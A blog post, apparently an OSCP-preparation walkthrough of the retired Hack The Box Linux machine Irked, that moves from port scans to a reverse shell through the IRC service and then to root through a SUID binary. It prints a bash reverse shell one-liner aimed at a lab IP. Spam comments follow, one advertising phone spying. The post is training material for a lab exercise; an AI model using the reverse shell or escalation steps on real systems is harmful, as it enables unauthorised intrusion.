OSCP PREPROTİONS – HTB Irked

The Irked machine is a machine with Linux operating system among the retired machines.
We’re doing a target scan.


classic scan

TCP Port Full scan

UDP Full Scan

Here are the ports that are open in order
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
6697/tcp open ircs-u
8067/tcp open infi-async
34900/tcp open unknown
65534/tcp open unknown
Among these ports, what draws our attention is 6697.port, which does not skip the classic scan and comes out with a full port scan. To see the details of the service running on this port;

The irc protocol is running on this port. We take this with us as additional information for now.
80.port http protocol works, we access the service via browser

We perform a directory scan we have provided with gobuster

We were unable to find any significant information in directory discovery
One thing about IRC draws our attention on the web service.
That’s why we focus on 6697.port that IRC runs.

Let’s connect IRC with ncat
nc 10.10.10.117 8067
We got a hostname error while connecting. We edit the /etc/hosts file and reconnect.

(received error)

Hostname added
Reconnecting

After the connection is established, we transmit the ping command to test whether the sent command works.

As you can see the command is working.

We can give a revershell to our own machine like this.
To give bash revershell
bash -c “bash -i >& /dev/tcp/10.10.14.3/1234 0>&1”
we will use the command on the side, we will run ncat on the back

We got our revershel
We couldn’t get our userflags. We got Permission denied error constantly.

We perform enumeration to gain privilege escalation on the machine.

We could not obtain information in the enumeration part, I got help here. We are expected to download the jpg file and extract the data in it with stegonagraphic methods.

With the obtained password, djmardov ssh connection is made.

In this way, we were able to obtain the user flag.
We tried to go to the root folder, but we got the permission denied error, here we are asked for privelege escalation.

It would perform enumeration again to raise authority. I used LinEnum.sh tool because manual enumeration takes a long time

The viewuser suid files are focused due to time difference when the output is inspected

Viewuser executed

Here /tmp/listusers says not found, there is no file here, apparently we will try to add a file here.
We created it, this time we got a permision deny error

Let’s give run permission to this file here

After the permission is defined, view user can be run

We saw that it returns the id value
Now you will be asked to give a shell with the sh command

As you can see, we got root permission 😊

Comments

  1. Pingback: OSCP Prep – HTB all Linux Machine – Muhammed AYGÜN

  2. Marguis

    I got this web page from my pal who informed me concerning this web
    page and now this time I am browsing this website and reading very informative articles or reviews at this place.

  3. Shaunette

    Great goods from you, man. I have understand your stuff previous to and you are just too fantastic.
    I really like what you have acquired here, really like what you’re stating and the way
    in which you say it. You make it entertaining and you still care
    for to keep it smart. I can’t wait to read far more from you.
    This is actually a terrific website.

  4. Cherlyn

    Howdy! Quick question that’s completely off topic.
    Do you know how to make your site mobile friendly? My weblog looks weird when browsing from my apple iphone.

    I’m trying to find a template or plugin that might be able to fix
    this issue. If you have any suggestions, please share.
    Thanks!

  5. Kalvin

    you are in reality a excellent webmaster. The web site loading pace is amazing.
    It kind of feels that you are doing any unique trick.
    Also, The contents are masterpiece. you have performed a
    great activity on this subject!

  6. Zubin

    Howdy! Quick question that’s entirely off topic. Do you know how to make your site mobile friendly?
    My website looks weird when viewing from my apple iphone. I’m trying to find a template or plugin that might be
    able to fix this issue. If you have any suggestions, please share.
    Thank you!

  7. Rastrear Celular

    Se você está se perguntando como descobrir se seu marido está traindo você no WhatsApp, talvez eu possa ajudar. Quando você pergunta ao seu parceiro se ele pode verificar seu telefone, a resposta usual é não.

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir